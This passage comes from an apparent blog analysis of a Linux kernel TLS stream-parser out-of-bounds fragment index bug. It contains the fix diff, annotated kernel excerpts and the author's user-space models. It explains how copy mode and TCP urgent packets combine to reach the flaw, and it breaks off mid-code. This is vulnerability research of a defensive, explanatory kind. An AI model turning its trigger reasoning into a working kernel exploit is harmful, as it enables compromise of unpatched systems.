<p>Previously, developers assumed that <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> was bounded by the maximum value <code class="language-plaintext highlighter-rouge">TLS_MAX_PAYLOAD_SIZE</code>, and therefore <strong>did not further validate the calculated fragment index</strong>.</p>

<p>However, because <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> could be invoked multiple times, <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> may grow excessively. As a result, the fragment index could <strong>become larger than the total fragment count</strong>, leading to out-of-bounds memory access or the use of uninitialized memory.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -211,11 +211,17 @@</span> static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
                 struct sk_buff *in_skb, unsigned int offset,
                 size_t in_len)
 {
<span class="gi">+    unsigned int nfrag = skb-&gt;len / PAGE_SIZE;
</span>     size_t len, chunk;
     skb_frag_t *frag;
     int sz;
 
<span class="gd">-    frag = &amp;skb_shinfo(skb)-&gt;frags[skb-&gt;len / PAGE_SIZE];
</span><span class="gi">+    if (unlikely(nfrag &gt;= skb_shinfo(skb)-&gt;nr_frags)) {
+        DEBUG_NET_WARN_ON_ONCE(1);
+        return -EMSGSIZE;
+    }
+
+    frag = &amp;skb_shinfo(skb)-&gt;frags[nfrag];
</span></code></pre></div></div>

<p>This patch introduces stricter validation of the packet length to ensure safer fragment handling.</p>
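
<p>The index arithmetic from the diff can be tried out in userspace. The sketch below is my own model, not the kernel function: <code class="language-plaintext highlighter-rouge">sketch_frag_index()</code> is a made-up name, and a 4096-byte page is an assumption.</p>

```c
#include <assert.h>
#include <errno.h>

/* Assumed page size for this sketch. */
#define SKETCH_PAGE_SIZE 4096u

/*
 * Models the patched index computation in tls_strp_copyin_frag():
 * returns the fragment index for the next write, or -EMSGSIZE when
 * the accumulated length already points past the last fragment.
 */
static int sketch_frag_index(unsigned int skb_len, unsigned int nr_frags)
{
    unsigned int nfrag = skb_len / SKETCH_PAGE_SIZE;

    /* Without this check, frags[nfrag] would be read out of bounds. */
    if (nfrag >= nr_frags)
        return -EMSGSIZE;

    return (int)nfrag;
}
```

<p>For example, with a hypothetical skb that has 5 fragments, a length of <code class="language-plaintext highlighter-rouge">4 * 4096 + 1</code> still maps to index 4, but once the length reaches <code class="language-plaintext highlighter-rouge">5 * 4096</code> the index equals the fragment count and the function bails out instead of touching <code class="language-plaintext highlighter-rouge">frags[5]</code>.</p>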

<h2 id="2-trigger-the-vulnerability">2. Trigger the Vulnerability</h2>

<p>Two conditions must be satisfied to trigger the vulnerability:</p>
<ol>
  <li>TLS stream copy mode (<code class="language-plaintext highlighter-rouge">strp-&gt;copy_mode</code>) is enabled.</li>
  <li>The packet length <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> is sufficiently small.</li>
</ol>

<h3 id="21-enabling-stream-copy-mode">2.1. Enabling Stream Copy Mode</h3>

<p>When the <strong>receive buffer becomes insufficient</strong> [1], the TLS parser enables copy mode [2] and uses <code class="language-plaintext highlighter-rouge">tls_strp_read_copyin()</code> to process subsequent packets [3, 4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">qshort</span> <span class="cm">/* true */</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">tcp_epollin_ready</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">INT_MAX</span><span class="p">)))</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [2]</span>
    
    <span class="c1">// [...]</span>
    <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span> <span class="c1">// [3]</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">tcp_epollin_ready</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="kt">int</span> <span class="n">target</span> <span class="cm">/* INT_MAX */</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">avail</span> <span class="o">=</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)</span> <span class="o">-</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">avail</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>

    <span class="k">return</span> <span class="p">(</span><span class="n">avail</span> <span class="o">&gt;=</span> <span class="n">target</span><span class="p">)</span> <span class="o">||</span> <span class="n">tcp_rmem_pressure</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span> <span class="cm">/* [1] */</span> <span class="o">||</span>
           <span class="p">(</span><span class="n">tcp_receive_window</span><span class="p">(</span><span class="n">tp</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="n">inet_csk</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">icsk_ack</span><span class="p">.</span><span class="n">rcv_mss</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
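
<p>The decision to enter copy mode boils down to one predicate, which can be modeled like this. Everything here is a simplification under my own assumptions: <code class="language-plaintext highlighter-rouge">struct sketch_tcp</code> is hypothetical, <code class="language-plaintext highlighter-rouge">rmem_pressure</code> stands in for <code class="language-plaintext highlighter-rouge">tcp_rmem_pressure(sk)</code>, and <code class="language-plaintext highlighter-rouge">rcv_wnd</code> stands in for <code class="language-plaintext highlighter-rouge">tcp_receive_window(tp)</code>.</p>

```c
#include <assert.h>
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical subset of the TCP state used by the check. */
struct sketch_tcp {
    uint32_t rcv_nxt;
    uint32_t copied_seq;
    uint32_t rcv_wnd;       /* stands in for tcp_receive_window(tp) */
    uint32_t rcv_mss;
    bool     rmem_pressure; /* stands in for tcp_rmem_pressure(sk) */
};

/* Models tcp_epollin_ready() from the listing above. */
static bool sketch_epollin_ready(const struct sketch_tcp *tp, int target)
{
    int avail = (int)(tp->rcv_nxt - tp->copied_seq);

    assert(tp);
    if (avail <= 0)
        return false;

    return avail >= target || tp->rmem_pressure ||
           tp->rcv_wnd <= tp->rcv_mss;
}

/* Mirrors the early return at the top of tls_strp_read_copy(). */
static bool sketch_enters_copy_mode(const struct sketch_tcp *tp, bool qshort)
{
    if (qshort && !sketch_epollin_ready(tp, INT_MAX))
        return false;
    return true;
}
```

<p>Since the target is <code class="language-plaintext highlighter-rouge">INT_MAX</code>, the <code class="language-plaintext highlighter-rouge">avail &gt;= target</code> term is practically never true, so in this model copy mode is only reached through memory pressure or a receive window that has shrunk to one MSS or less.</p>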

<h3 id="22-small-packet-size">2.2. Small Packet Size</h3>

<p>The value of <code class="language-plaintext highlighter-rouge">strp-&gt;stm.full_len</code> depends on the return value of <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">tls_strp_abort_strp</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">sz</span><span class="p">);</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">=</span> <span class="n">sz</span><span class="p">;</span> <span class="c1">// [1]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> returns 0 as the packet size only when the packet is <strong>still too small to be parsed</strong> [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_rx_msg_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tls_context</span> <span class="o">*</span><span class="n">tls_ctx</span> <span class="o">=</span> <span class="n">tls_get_ctx</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">tls_prot_info</span> <span class="o">*</span><span class="n">prot</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">tls_ctx</span><span class="o">-&gt;</span><span class="n">prot_info</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">header</span><span class="p">[</span><span class="n">TLS_HEADER_SIZE</span> <span class="o">+</span> <span class="n">TLS_MAX_IV_SIZE</span><span class="p">];</span>
    <span class="kt">size_t</span> <span class="n">cipher_overhead</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">data_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">offset</span> <span class="o">+</span> <span class="n">prot</span><span class="o">-&gt;</span><span class="n">prepend_size</span> <span class="cm">/* 13 */</span> <span class="o">&gt;</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span> <span class="c1">// [2]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
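
<p>A tiny model of check [2] shows how long the size stays at 0 while data trickles in. The helper names are made up, the value 13 is taken from the annotation in the listing above, and the byte-by-byte arrival is only an assumption for illustration.</p>

```c
#include <assert.h>
#include <stddef.h>

/* 13 matches the prepend_size annotated in the listing above. */
#define SKETCH_PREPEND_SIZE 13

/* Returns 1 when enough bytes are buffered to parse the header, else 0. */
static int sketch_header_ready(size_t offset, size_t skb_len)
{
    if (offset + SKETCH_PREPEND_SIZE > skb_len)
        return 0;   /* same condition as check [2] */
    return 1;
}

/*
 * Counts how many arrivals leave the record size unknown when
 * total_bytes arrive one byte at a time (an assumed traffic pattern).
 */
static unsigned int sketch_unparsed_steps(size_t offset, size_t total_bytes)
{
    unsigned int steps = 0;
    size_t len;

    for (len = 1; len <= total_bytes; len++) {
        if (!sketch_header_ready(offset, len))
            steps++;
    }
    return steps;
}
```

<p>With an offset of 0, the first 12 bytes all leave the size unknown, so <code class="language-plaintext highlighter-rouge">full_len</code> would stay 0 for each of those calls in this model.</p>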

<p>However, these two conditions <strong>appear to conflict</strong> 🤯: if the packet size is too small, the receive buffer will remain empty, and copy mode will not be enabled.</p>

<h3 id="23-oob-packet">2.3. OOB Packet</h3>

<p><strong>Out-of-band (OOB)</strong>, also known as <strong>Urgent</strong>, is a packet type used to notify the receiver of an emergency condition. This type of packet contains only a single byte of data and has higher priority than a normal packet.</p>

<p><code class="language-plaintext highlighter-rouge">tcp_rcv_established()</code> calls <code class="language-plaintext highlighter-rouge">tcp_urg()</code> to handle urgent packets before calling <code class="language-plaintext highlighter-rouge">tcp_data_queue()</code> to process regular data.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">tcp_rcv_established</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">tcp_urg</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">th</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="n">tcp_data_queue</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">tcp_urg()</code> first checks whether the packet carries urgent data by calling <code class="language-plaintext highlighter-rouge">tcp_check_urg()</code>. If it does, the urgent sequence number <code class="language-plaintext highlighter-rouge">tp-&gt;urg_seq</code> is updated [1]. Once the urgent byte itself is available, <code class="language-plaintext highlighter-rouge">sk-&gt;sk_data_ready()</code> is called [2], which internally invokes <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_urg</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">tcphdr</span> <span class="o">*</span><span class="n">th</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">urg</span><span class="p">))</span>
        <span class="n">tcp_check_urg</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">th</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">==</span> <span class="n">TCP_URG_NOTYET</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">&lt;</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// [...]</span>
            <span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tmp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
            <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span><span class="p">,</span> <span class="n">TCP_URG_VALID</span> <span class="o">|</span> <span class="n">tmp</span><span class="p">);</span>
            <span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_data_ready</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [2]</span>
            <span class="c1">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_check_urg</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">tcphdr</span> <span class="o">*</span><span class="n">th</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u32</span> <span class="n">ptr</span> <span class="o">=</span> <span class="n">ntohs</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">urg_ptr</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">ptr</span> <span class="o">+=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">seq</span><span class="p">);</span>

    <span class="cm">/* Ignore urgent data that we've already seen and read. */</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">after</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">,</span> <span class="n">ptr</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">before</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    
    <span class="c1">// Allow newer urgent</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">after</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span><span class="p">,</span> <span class="n">TCP_URG_NOTYET</span><span class="p">);</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">ptr</span><span class="p">);</span> <span class="c1">// [1]</span>
<span class="p">}</span>
</code></pre></div></div>
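
<p>The <code class="language-plaintext highlighter-rouge">before()</code> and <code class="language-plaintext highlighter-rouge">after()</code> helpers used in <code class="language-plaintext highlighter-rouge">tcp_check_urg()</code> compare 32-bit sequence numbers modulo 2^32. Below is a minimal user-space sketch of that comparison, assuming the usual signed-difference definition; the names <code class="language-plaintext highlighter-rouge">seq_before</code> and <code class="language-plaintext highlighter-rouge">seq_after</code> are illustrative stand-ins, not kernel symbols.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical user-space stand-in for the kernel's before(). */
static bool seq_before(uint32_t a, uint32_t b)
{
    /* The signed difference keeps the comparison correct across wraparound. */
    return (int32_t)(a - b) < 0;
}

/* Hypothetical user-space stand-in for the kernel's after(). */
static bool seq_after(uint32_t a, uint32_t b)
{
    return seq_before(b, a);
}
```

<p>Because the difference is interpreted as signed, a sequence number just past the 32-bit wrap still compares as "after" one just before it.</p>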

<p><code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> calls <code class="language-plaintext highlighter-rouge">tcp_inq()</code> to obtain the <strong>current TCP in-queue size</strong> [2], i.e., how much data can be retrieved. This value depends on whether there is urgent data.</p>

<p>Each time a new urgent packet arrives, <code class="language-plaintext highlighter-rouge">tp-&gt;urg_seq</code> is set to <code class="language-plaintext highlighter-rouge">tp-&gt;rcv_nxt</code>, so <code class="language-plaintext highlighter-rouge">!before(tp-&gt;urg_seq, tp-&gt;rcv_nxt)</code> holds. All <code class="language-plaintext highlighter-rouge">tcp_inq()</code> calls from <code class="language-plaintext highlighter-rouge">tcp_urg()</code> therefore take the branch marked [3] and return <code class="language-plaintext highlighter-rouge">rcv_nxt - copied_seq</code>, the number of unread bytes.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">sz</span><span class="p">,</span> <span class="n">inq</span><span class="p">;</span>

    <span class="n">inq</span> <span class="o">=</span> <span class="n">tcp_inq</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">inq</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// [...]</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">tcp_inq</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">answ</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">sock_flag</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">SOCK_URGINLINE</span><span class="p">)</span> <span class="o">||</span>
           <span class="o">!</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">||</span>
           <span class="n">before</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">)</span> <span class="o">||</span>
           <span class="o">!</span><span class="n">before</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">))</span> <span class="p">{</span>

        <span class="n">answ</span> <span class="o">=</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span> <span class="o">-</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">;</span> <span class="c1">// [3]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">answ</span> <span class="o">=</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span> <span class="o">-</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">;</span> <span class="c1">// [5]</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">answ</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
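
<p>The branch selection in <code class="language-plaintext highlighter-rouge">tcp_inq()</code> can be replayed in user space. This is only a sketch: <code class="language-plaintext highlighter-rouge">struct inq_model</code> and <code class="language-plaintext highlighter-rouge">model_tcp_inq()</code> are hypothetical names, and the parts elided with <code class="language-plaintext highlighter-rouge">[...]</code> in the excerpt are not modeled.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for the tcp_sock fields tcp_inq() reads. */
struct inq_model {
    uint32_t copied_seq;
    uint32_t urg_seq;
    uint32_t rcv_nxt;
    bool urg_data;   /* true when tp->urg_data is non-zero */
    bool urg_inline; /* true when SOCK_URGINLINE is set */
};

/* Wraparound-safe "a is before b", assuming the signed-difference definition. */
static bool seq_before(uint32_t a, uint32_t b)
{
    return (int32_t)(a - b) < 0;
}

/* Mirrors only the two branches quoted in the excerpt. */
static int model_tcp_inq(const struct inq_model *m)
{
    if (m->urg_inline || !m->urg_data ||
        seq_before(m->urg_seq, m->copied_seq) ||
        !seq_before(m->urg_seq, m->rcv_nxt))
        return (int)(m->rcv_nxt - m->copied_seq); /* branch [3] */

    return (int)(m->urg_seq - m->copied_seq);     /* branch [5] */
}
```

<p>With <code class="language-plaintext highlighter-rouge">copied_seq = 0</code>, <code class="language-plaintext highlighter-rouge">urg_seq = 1</code>, and <code class="language-plaintext highlighter-rouge">rcv_nxt = 0x2002</code>, the model takes branch [5] and returns 1, even though far more data is queued behind the urgent byte.</p>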

<p>After that, <code class="language-plaintext highlighter-rouge">tcp_data_queue()</code> is called, and then <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> is invoked again [4].</p>

<p>This time, since the one-byte urgent data has already been processed and <code class="language-plaintext highlighter-rouge">tp-&gt;rcv_nxt</code> has been updated, <code class="language-plaintext highlighter-rouge">tcp_inq()</code> takes the last branch [5] and returns <code class="language-plaintext highlighter-rouge">urg_seq - copied_seq</code>, i.e., the number of unread bytes queued before the urgent byte.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_data_queue</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">TCP_SKB_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">seq</span> <span class="o">==</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">eaten</span> <span class="o">=</span> <span class="n">tcp_queue_rcv</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fragstolen</span><span class="p">);</span>
        
        <span class="c1">// [...]</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sock_flag</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">SOCK_DEAD</span><span class="p">))</span>
            <span class="n">tcp_data_ready</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [4]</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function <code class="language-plaintext highlighter-rouge">tcp_queue_rcv()</code> not only queues the packet data but also attempts to coalesce the new packet into the tail of the receive queue [6].</p>

<p>This means if the previous <code class="language-plaintext highlighter-rouge">skb</code> has enough buffer space, the <strong>new skb will be merged into it</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="n">__must_check</span> <span class="nf">tcp_queue_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                      <span class="n">bool</span> <span class="o">*</span><span class="n">fragstolen</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">eaten</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">tail</span> <span class="o">=</span> <span class="n">skb_peek_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_receive_queue</span><span class="p">);</span>

    <span class="n">eaten</span> <span class="o">=</span> <span class="p">(</span><span class="n">tail</span> <span class="o">&amp;&amp;</span>
         <span class="n">tcp_try_coalesce</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">tail</span><span class="p">,</span> <span class="c1">// [6]</span>
                  <span class="n">skb</span><span class="p">,</span> <span class="n">fragstolen</span><span class="p">))</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">tcp_rcv_nxt_update</span><span class="p">(</span><span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">),</span> <span class="n">TCP_SKB_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">end_seq</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">eaten</span><span class="p">)</span> <span class="p">{</span>
